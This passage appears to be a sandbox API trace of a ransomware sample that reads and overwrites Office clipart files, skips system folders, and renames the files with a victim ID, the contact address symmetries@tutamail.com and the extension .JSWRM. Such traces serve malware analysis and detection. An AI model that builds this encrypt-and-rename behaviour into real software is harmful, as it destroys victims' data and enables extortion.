returned 0x210288 [0077.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0077.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0077.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.717] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3964) returned 1 [0077.717] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf70) returned 0x23fc98 [0077.717] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf70, lpOverlapped=0x0) returned 1 [0077.719] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.719] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf70, lpOverlapped=0x0) returned 1 [0077.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0077.719] CloseHandle (hObject=0x314) returned 1 [0077.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0077.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0077.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0077.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0077.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0077.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0077.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.719] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0077.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0077.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0077.720] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x488, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD01193_.WMF", cAlternateFileName="")) returned 1 [0077.720] lstrcmpiW (lpString1="FD01193_.WMF", lpString2=".") returned 1 [0077.720] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="..") returned 1 [0077.720] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="...") returned 1 [0077.720] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="windows") returned -1 [0077.720] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="recovery") returned -1 [0077.720] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="perflogs") returned -1 [0077.720] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="documents and settings") returned 1 [0077.720] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.720] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="system volume information") returned -1 [0077.720] lstrcmpiW (lpString1="FD01193_.WMF", lpString2="msocache") returned -1 [0077.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0077.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01193_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01193_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01193_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0077.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0077.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01193_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01193_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01193_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0077.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0077.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0077.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0077.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.721] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1160) returned 1 [0077.721] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x480) returned 0x230a00 [0077.722] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x480, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x480, lpOverlapped=0x0) returned 1 [0077.726] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.726] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x480, lpOverlapped=0x0) returned 1 [0077.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0077.726] CloseHandle (hObject=0x314) returned 1 [0077.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0077.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0077.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0077.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0077.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0077.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0077.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.727] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0077.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0077.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0077.727] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x91c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD01196_.WMF", cAlternateFileName="")) returned 1 [0077.727] lstrcmpiW (lpString1="FD01196_.WMF", lpString2=".") returned 1 [0077.727] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="..") returned 1 [0077.727] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="...") returned 1 [0077.727] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="windows") returned -1 [0077.727] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="recovery") returned -1 [0077.727] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="perflogs") returned -1 [0077.727] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="documents and settings") returned 1 [0077.728] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.728] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="system volume information") returned -1 [0077.728] lstrcmpiW (lpString1="FD01196_.WMF", lpString2="msocache") returned -1 [0077.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0077.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01196_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01196_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01196_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0077.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0077.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01196_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01196_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01196_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0077.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0077.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0077.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0077.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.728] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2332) returned 1 [0077.728] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x910) returned 0x20c6c0 [0077.728] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x910, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x910, lpOverlapped=0x0) returned 1 [0077.732] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.732] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x910, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x910, lpOverlapped=0x0) returned 1 [0077.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0077.732] CloseHandle (hObject=0x314) returned 1 [0077.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0077.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0077.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0077.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0077.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0077.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0077.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0077.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0077.732] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0077.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0077.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0077.733] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x284c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD01548_.WMF", cAlternateFileName="")) returned 1 [0077.733] lstrcmpiW (lpString1="FD01548_.WMF", lpString2=".") returned 1 [0077.733] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="..") returned 1 [0077.733] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="...") returned 1 [0077.733] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="windows") returned -1 [0077.733] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="recovery") returned -1 [0077.733] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="perflogs") returned -1 [0077.733] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="documents and settings") returned 1 [0077.733] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.733] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="system volume information") returned -1 [0077.734] lstrcmpiW (lpString1="FD01548_.WMF", lpString2="msocache") returned -1 [0077.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0077.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01548_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01548_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01548_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0077.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0077.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01548_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01548_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01548_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0077.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0077.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0077.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0077.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.735] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10316) returned 1 [0077.735] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2840) returned 0x24d210 [0077.735] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2840, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2840, lpOverlapped=0x0) returned 1 [0077.737] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.737] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2840, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2840, 